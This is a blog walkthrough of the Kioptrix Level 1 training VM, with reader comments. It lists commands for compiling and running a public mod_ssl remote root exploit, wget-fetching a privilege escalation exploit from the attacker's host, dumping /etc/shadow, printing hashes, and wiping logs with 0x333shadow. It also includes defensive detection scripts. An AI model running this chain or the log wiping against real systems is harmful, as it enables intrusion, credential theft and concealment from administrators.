2011-02-11

[Video] Kioptrix - Level 1 (mod_ssl)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4845917/
Download video: http://www.mediafire.com/?r3327dt3re397hb





Brief Overview
Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim of going from "boot" to "root" by any means possible. This video demonstrates a well-known, long-patched issue in "mod_ssl". Because it wasn't too complex, I extended the video by having the attacker remove their traces from some log files.



Method
    * Scan network for hosts (nmap)
    * Scan target for running services (nmap)
    * Scan target for running web services (nikto)
    * Discover and run exploit (OpenFuckV2)
    * Gain root (OpenFuckV2)
    * Game Over
    * Modify logs (0x333shadow)



What do I need?
    * Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD5:D8DB6CE65652880327B92150B08106EA)
    * VMware player OR workstation. Download here
    * nmap – (Can be found on BackTrack 4-R2). Download here
    * nikto - (Can be found on BackTrack 4-R2)
    * Internet Browser – (Firefox can be found on BackTrack 4-R2)
    * A Text Editor – (Kate can be found on BackTrack 4-R2)
    * OpenFuckv2.c – (Can be found on exploit-db.com)
    * ptrace/kmod local root exploit – (Can be found on securityfocus.com)
    * 0x333shadow.tar – (Can be found on packetstormsecurity.org)



Walkthrough
A quick general nmap scan shows which hosts are currently on the network, before a more detailed scan of the target (192.168.0.111). The detailed scan shows which services (ports) the target has running and the version of each service, then attempts to identify the operating system (OS). The results are:
    * OS: Linux v2.4.x (2.4.9-18)
    * Web Server: Apache httpd 1.3.20 ((Unix) (Red-hat/Linux)) mod_ssl 2.8.4/OpenSSL 0.9.6b

The next stage is to use nikto to detect which vulnerabilities the web server has. Nikto identifies that the version of mod_ssl is "vulnerable to a remote buffer overflow which may allow a remote shell" [CVE-2002-0082, OSVDB-756].
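As an added example (not part of the original post, and not code from the nikto or Kioptrix projects), here is a small Python check that does for a single nmap -sV banner what nikto's banner test does: it pulls out the httpd, mod_ssl and OpenSSL versions and flags the Apache 1.3 mod_ssl add-on when it predates 2.8.7. The 2.8.7 fixed-version threshold is my assumption from the CVE-2002-0082 advisory rather than something stated above, so confirm it before relying on the script. It deliberately does not apply that threshold to Apache 2.x, whose bundled mod_ssl carries the httpd version number (the situation in comment 17 below). The two banners it runs on are the ones quoted in this post and in that comment.

```python
import re

# Assumption, taken from the CVE-2002-0082 advisory as I recall it (verify it
# yourself): the Apache 1.3 mod_ssl add-on is affected before release 2.8.7.
# Apache 2.x bundles its own mod_ssl, numbered like httpd itself (e.g. 2.0.46),
# so that lineage is deliberately not matched against this threshold.
MODSSL_FIXED = "2.8.7"

HTTPD_RE = re.compile(r"Apache httpd (?P<version>\d+(?:\.\d+)*)")
COMPONENT_RE = re.compile(
    r"(?P<product>mod_ssl|OpenSSL)[ /](?P<version>\d+(?:\.\d+)*[a-z]?)"
)


def parse_version(text):
    """'2.8.4' -> (2, 8, 4, 0); '0.9.6b' -> (0, 9, 6, 2). The trailing letter
    (OpenSSL style) becomes the last element so that 0.9.6b sorts after 0.9.6."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", text)
    if not m:
        raise ValueError(f"unparsable version: {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    letter = ord(m.group(2)) - ord("a") + 1 if m.group(2) else 0
    return nums + (letter,)


def extract_components(banner):
    """Pull httpd / mod_ssl / OpenSSL version strings out of an nmap -sV banner.
    Both 'mod_ssl 2.8.4/OpenSSL 0.9.6b' and 'mod_ssl/2.0.46 OpenSSL/0.9.7a' parse."""
    comps = {}
    m = HTTPD_RE.search(banner)
    if m:
        comps["httpd"] = m.group("version")
    for m in COMPONENT_RE.finditer(banner):
        comps[m.group("product")] = m.group("version")
    return comps


def assess_banner(banner):
    """Return the parsed components plus any findings for the banner."""
    comps = extract_components(banner)
    findings = []
    modssl = comps.get("mod_ssl")
    httpd = parse_version(comps["httpd"]) if "httpd" in comps else None
    # Only the Apache 1.3 add-on lineage is compared against the 2.8.7 threshold.
    if modssl and httpd and httpd[:2] == (1, 3):
        if parse_version(modssl) < parse_version(MODSSL_FIXED):
            findings.append(
                f"mod_ssl {modssl} predates {MODSSL_FIXED}: CVE-2002-0082 "
                "(remote buffer overflow in the Apache 1.3 mod_ssl add-on)"
            )
    return {"components": comps, "findings": findings}


if __name__ == "__main__":
    # The two banners are the ones quoted in this post and in comment 17.
    for b in [
        "Apache httpd 1.3.20 ((Unix) (Red-hat/Linux)) mod_ssl 2.8.4/OpenSSL 0.9.6b",
        "Apache httpd 2.0.46 ((Red Hat) mod_ssl/2.0.46 OpenSSL/0.9.7a)",
    ]:
        r = assess_banner(b)
        print(r["components"], r["findings"] or "no mod_ssl finding")
```

Feed it the service line from `nmap -sV` output; for an inventory sweep, loop over the banners of every host and raise a ticket for each non-empty findings list. Version strings are compared as tuples rather than as text so that 2.8.10 correctly sorts after 2.8.7.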

The attacker then searches an exploit database (exploit-db.com), which returns a couple of exploits. The chosen exploit was labelled "OpenFuckV2.c".

The exploit needed to be modified to compile on the attacker's computer, due to updated OpenSSL library files, as well as to update the link to the privilege escalation exploit.

After the exploit has been compiled, the attacker looks up the details of the target's environment (from the earlier nmap and nikto scans) and runs the exploit. Afterwards, not only has the attacker successfully gained a remote shell, they also have "root" access on the target's system.

As the exploit targets “mod_ssl”, it inherits the same privileges as the user running the service (in this case “apache”). If the current privileges aren't enough for the attacker to reach their goal, they must use a privilege escalation attack to gain further access to the system. In most cases, the targeted account would be the highest user, “root”, which would allow the attacker to control anything on the target's system.

Once the attacker has a remote shell, the next few commands check the objective (which is displayed locally on the login screen), the local environment and the password file.

The attacker has been using their own machine directly, as well as hosting all the necessary files on it; therefore, to attempt to cover their tracks, they remove their IP address from various locations. This is done using a program called "0x333shadow".

The attacker runs 0x333shadow, which removes traces of the attacker's IP from all default log directories and binary log files (utmp, wtmp, utmpx, wtmpx, lastlog), as well as scanning “syslog” and “newsyslog” to try to detect other log locations. The attacker tells 0x333shadow to remove the logs 5 seconds after it starts, which gives them time to remove all traces of the program itself.



Commands
nmap 192.168.0.0/24 -n -sP -sn 
nmap 192.168.0.111 -O -sS -sV -v 
clear 

cd /pentest/scanners/nikto 
./nikto.pl -host 192.168.0.111 -Display 124 

Firefox: Search (exploit.db): OpenSSL -> Download 
#http://www.exploit-db.com/exploits/764/ 

cd ~ 
gcc 764.c -o exploit -lcrypto 
kate 764.c 
-> Add: #include <openssl/rc4.h> 
-> Add: #include <openssl/md5.h> 
Firefox: Search (Google): ptrace-kmod.c. Download: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c 
cp ptrace-kmod.c /var/www/ 
start-apache 
-> Replace: wget 192.168.0.33/ptrace-kmod.c 
-> Save 
gcc 764.c -o exploit -lcrypto 
ls 
./exploit 
./exploit 0x6b 192.168.0.111 443 

uname -a 
#cat /etc/*-release 
whoami 
cat /etc/issue 
mail 
1 
exit 

cat /etc/shadow 

cd /var/log && grep -r 192.168.0.33 ./ 
* Firefox: Google -> Search: 0x333shadow.tar.gz. Download: http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/0x333shadow.tar.gz 
* tar xvf 0x333shadow.tar.gz 
* cd 0x333shadow 
* ls 
* cp 0x333shadow.c /var/www/rmLogs.c 
cd /tmp 
wget 192.168.0.33/rmLogs.c 
gcc rmLogs.c -o rmLogs -D Linux 
ls 
./rmLogs 
./rmLogs -a -i 192.168.0.33 -l 5 && rm -rf * 
cd /var/log && grep -r 192.168.0.33 ./ 
locate .bash_history 
cat /home/john/.bash_history 
cat /root/.bash_history 

uname -a && whoami 

#--------------------------------------------------------------------- 
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7::: 
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7::: 
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7::: 
#--------------------------------------------------------------------- 

Notes
    * This is a well-known old vulnerability, and has a few different variations on the exploit.
    * OpenFuckV2.c (which uses "ptrace-kmod.c") might not gain "root" if the target doesn't have gcc installed or isn't running a vulnerable kernel version.
    * The attacker may be logged by another service, which 0x333shadow might not remove.
    * Just because the logs have been deleted, doesn't mean you have covered all traces. For example, forensics tools can recover deleted files.
    * As the target only communicates with the attacker directly, rather than via a 3rd party, removing the logs is simpler.
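As an added example (not part of the original post, and unrelated to 0x333shadow's own code), the following Python is the defender's side of the log-cleaning step in the walkthrough and of the last three notes above. It reads Linux wtmp records and compares a host's local wtmp against a copy that was shipped off the box before any cleanup (remote syslog, a log collector, or a periodic copy): a wiper that filters the attacker's IP out of the local binary logs cannot touch that copy, so any login event present remotely but missing locally is evidence the local file was rewritten. The struct layout is glibc's 384-byte utmp format; both wtmp blobs are constructed inline as sample data, using 192.168.0.33 as the address from this post.

```python
import struct

# glibc's 384-byte struct utmp layout (little-endian; 2 pad bytes after ut_type).
# Fields: ut_type, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# exit_status (2 shorts), ut_session, tv_sec, tv_usec, ut_addr_v6[4], unused[20].
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS = 7  # ut_type value for a logged-in user session


def _cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_wtmp(data):
    """Parse a wtmp/utmp byte blob into record dicts (a trailing partial record is ignored)."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({
            "type": f[0], "pid": f[1], "line": _cstr(f[2]), "id": _cstr(f[3]),
            "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9],
        })
    return records


def login_events(records):
    """The (user, host, time) triples an IP-based wiper filters out: USER_PROCESS entries."""
    return {(r["user"], r["host"], r["time"]) for r in records if r["type"] == USER_PROCESS}


def missing_from_local(local_wtmp, remote_wtmp):
    """Login events present in the off-host copy but absent locally: evidence wtmp was rewritten."""
    return sorted(login_events(parse_wtmp(remote_wtmp)) - login_events(parse_wtmp(local_wtmp)))


def pack_record(user, line, host, tv_sec, pid, ut_type=USER_PROCESS):
    """Build one record; used here only to construct the sample data below."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0, b"")


def build_sample():
    """Constructed sample: the remote copy holds three logins; the local file has had the
    192.168.0.33 entry filtered out, which is what an IP-based wiper leaves behind."""
    base = 1297440000  # constructed timestamp (Feb 2011)
    remote = b"".join([
        pack_record("john", "pts/0", "192.168.0.5", base, 2101),
        pack_record("john", "pts/1", "192.168.0.33", base + 600, 2187),
        pack_record("harold", "pts/0", "192.168.0.7", base + 900, 2240),
    ])
    local = b"".join([
        pack_record("john", "pts/0", "192.168.0.5", base, 2101),
        pack_record("harold", "pts/0", "192.168.0.7", base + 900, 2240),
    ])
    return local, remote


if __name__ == "__main__":
    local, remote = build_sample()
    for user, host, when in missing_from_local(local, remote):
        print(f"TAMPERING? login of {user} from {host} at {when} is missing from local wtmp")
```

On a real host you would read `/var/log/wtmp` for the local side and the collector's copy for the remote side; the comparison is on the (user, host, time) triple, so a wiper that rewrites the file while keeping record order still shows up. The same idea applies to text logs under /var/log: any entry the collector holds but the host does not is the indicator, which is why shipping logs off the box is the practical answer to the "other service may have logged it" and "forensics can recover it" notes.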

Song: Rocco – Everyone 9.0 (Single Mix) & Kompulsor – Around the World (La La La La) (Single Edit)
Video length: 06:22
Capture length: 19:31
Blog Post: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-1-modssl.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38314-%5Bvideo%5D-kioptrix-level-1-mod_ssl.html#post190751



~g0tmi1k

17 comments:

  1. Hi, I have tried this with Kioptrix VM Level 1 and am having no success with the OpenFuckV2 exploit. Shouldn't this exploit work as it is the same VM? It reaches the same point as you in the video (Spawning Shell...) and then says "Good Bye...", instead of spawning a shell and downloading ptrace-kmod.c. Any ideas as to why it is failing to exploit? Thanks.

  2. @gorara
    What do you mean by "Same VM"? How are you running Backtrack and Kioptrix?
    What mode/setting is the network set to as well?

  3. Hi, I meant "same VM" as in the same VM you are running: Kioptrix VM Level 1. I am running backtrack 4 r2, and Kioptrix VM Level 1 in a Virtualbox VM. The Kioptrix box is set to bridged networking. I was having trouble getting the exploit to work, but finally did in the end. Although I had to run it quite a few times before it succeeded. Is it usual for this exploit to fail a few times before working?

  4. @gorara
    I've seen the exploit you mentioned behave that way. So I guess it could be considered normal...

  5. @g0tmi1k .... thanks for taking the time to put this together ... i am going to go for the mod_ssl exploit this evening ... however, I was also successful in finding a legitimate samba 2.2.1a exploit in metasploit ... it kicked back a remote shell with root privileges rather quick ... I will post the exact exploit and payload later today .. on to level 2! .. thanks again for the exercise.

  6. @gorara It is because of the address space randomization. Check in your bt machine for /proc/sys/kernel/randomize_va_space
    It should be set to 0.

  7. @gorara
    I'm glad that you got it working. =)
    Personally I've only used that exploit for this system - and I didn't have any issues (or don't remember of any!).


    @loneferret
    That's good to know! =)
    I will make a note of this in the post.


    @p.j. hartlieb
    Thanks for the thanks! =)
    Yeah - I also found the same method & did a video on it here: http://g0tmi1k.blogspot.com/2011/03/video-kioptrix-level-1-samba.html
    Level 2 was really fun! How are/did you find it?
    This project belongs to loneferret, however I'm glad you enjoyed it! =D


    @adityagujar
    Thanks for the heads up! =D

  8. Hi!
    I'm using BackTrack 5 with Kioptrix.. I'm getting some errors when I try to run: gcc 764.c -o exploit -lcrypto

    It says it doesn't find openssl somehow.
    openssl



    Would like to know what I'm doing wrong here..
    Thanks for the tutorial!

  9. Here is the output error i get: http://pastebin.com/DF4e45se

    I also don't have a ./exploit to run.

    I'm pretty new to this, so it would be great if anyone could tell me what I'm doing wrong here. I also have the latest Kioptrix running.

    Thanks!

  10. @g0tmi1k ... finishing up level 2 now ... looking for a way to escalate my privileges ... dumped the DB but there are no damn credentials for ssh :( .. i was hoping that they would be lazier ;) ... this one is a great puzzle ...learned a lot ... hardest thing is finding time to work it when the family goes to bed ... thanks again.

  11. @hejsanheterjag
    BackTrack 5 might have updated the libraries - which could cause the error...
    Did you update and modify the exploit:
    e.g. -> Add: "#include " & "#include " like in the video?

    It's not compiling correctly, which is what the error messages are saying, which is why you don't have any output (./exploit)


    @p.j. hartlieb
    I have done another blog post on level 2: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-2-injection.html
    Here is a hint: The database is a dead end (as you found out). Somewhere doesn't check the input too well which allows commands be executed...
    That's the aim of boot2roots - for you to learn and try things out - it's great to hear that you have =)
    I hope you crack it soon (and there is now another one after it) And credit to the author of it,
    http://kioptrix.com/

  12. Hi, cool video. BTW, what is the name of the widget that shows cpu, mem, top 5 procs ...etc.

  13. @rEa
    Thanks for the thanks.

    conky (with an edited template)

  14. How can I modify and update the exploit please? I don't understand

  15. hi,
    Thanks for this demo... Is there a version for apache 2.x.x? (2.2.11 for me)

  16. @DevC0derz
    You need to use a text editor (which ever you like, geany, kate, gedit, nano, vi etc etc) and then add in:
    #include
    #include
    *Just like in the video @ 1:50* =)



    @pierre news
    Looking at the exploit source code, no.

  17. Nmap got this:

    8443/tcp open ssl/http Apache httpd 2.0.46 ((Red Hat) mod_ssl/2.0.46 OpenSSL/0.9.7a)
    Service Info: Host: localhost.localdomain; OSs: Unix, Linux


    So I need to use this, right?:

    sudo ./exploit 0x78 X.X.X.X 8443


    Because:
    0x78 - RedHat Linux 8.0 (apache-2.0.40)


    And I got this:

    Establishing SSL connection
    get server hello: Remote server does not support 128 bit RC4


    So can you help me? (And I love the music!!!)
